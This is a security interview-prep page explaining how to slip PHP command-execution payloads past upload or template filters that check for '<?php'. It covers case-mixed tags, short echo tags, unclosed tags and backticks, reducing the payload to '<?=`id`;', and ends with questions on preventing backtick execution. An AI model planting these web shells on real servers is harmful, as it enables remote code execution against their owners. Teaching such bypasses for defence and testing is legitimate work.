# Simple bypass PHP

The common way of writing PHP is start with `<?` and ends with `?>`

Example:

```
<?php phpinfo();?>
```

When attempting to upload file or modify templates, often it will check if the content starts with \`\<?php\` tags

So what are the ways to bypass it?

## Method 1

Use upper and lower case

```
<?pHp system('id');?>
```

## Method 2

Replace the php starting tag with `=`

E.g.

```
<?= system('id');?>
```

## PHP Reduction Challenge: Use 8 characters to run the `id` command

Origin Command

```
<?php system('id');?>  // 21 character
```

### First reduction: PHP tags allow for being unclosed.

PHP has a feature where PHP tags are allowed to be unclosed. This means that you can use `<?php` without using `?>`, and it won't affect the execution of the PHP code.

Utilizing this feature, we can reduce the previous code as follows.

```
<?php system('id'); // 19 character
```

### Second reduction: PHP short tags.

In addition to the standard way of writing PHP tags, there are two other forms, also known as short tags.

```
<?= ?>
```

Utilizing this feature, we can reduce the previous code as follows.

```
<?= system('id'); // 17 character
```

### Third reduction: Changing the method of executing the command.

Since our goal is to successfully execute the command, is there a method that can shorten the code for executing the command? For example, is there a function that is shorter than `system`?

PHP, being a large language, of course, has functions shorter than `system` that can also execute commands.

```
eval()
popen()
exec()
....
```

These are still not short enough. The shortest of all is the backticks `` ` ` ``. PHP can execute commands using backticks.

```
system('id')  =>  `id`
```

Utilizing this feature, we can reduce the previous code as follows.

```
<?=`id`;
```

<figure><img src="https://4157702631-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FslGw3ZF0EFGfkPZZ1EMu%2Fuploads%2FuFiUgax0gxmpq9MrrR3Q%2Fimage.png?alt=media&#x26;token=5e3db974-fa15-42d5-a08d-a69116325710" alt=""><figcaption></figcaption></figure>

## Interview Question

It is interesting to see how the backticks can excute shell commands, does backticks bind to `system` function or `shell_exec` function?

Will disable this 2 functions preventing backtick from executing? If not how do you prevent it?

## Author&#x20;

[Ikonw](https://github.com/Ik0nw/)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://greenhat.gitbook.io/interview-bank/web/simple-bypass-php.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.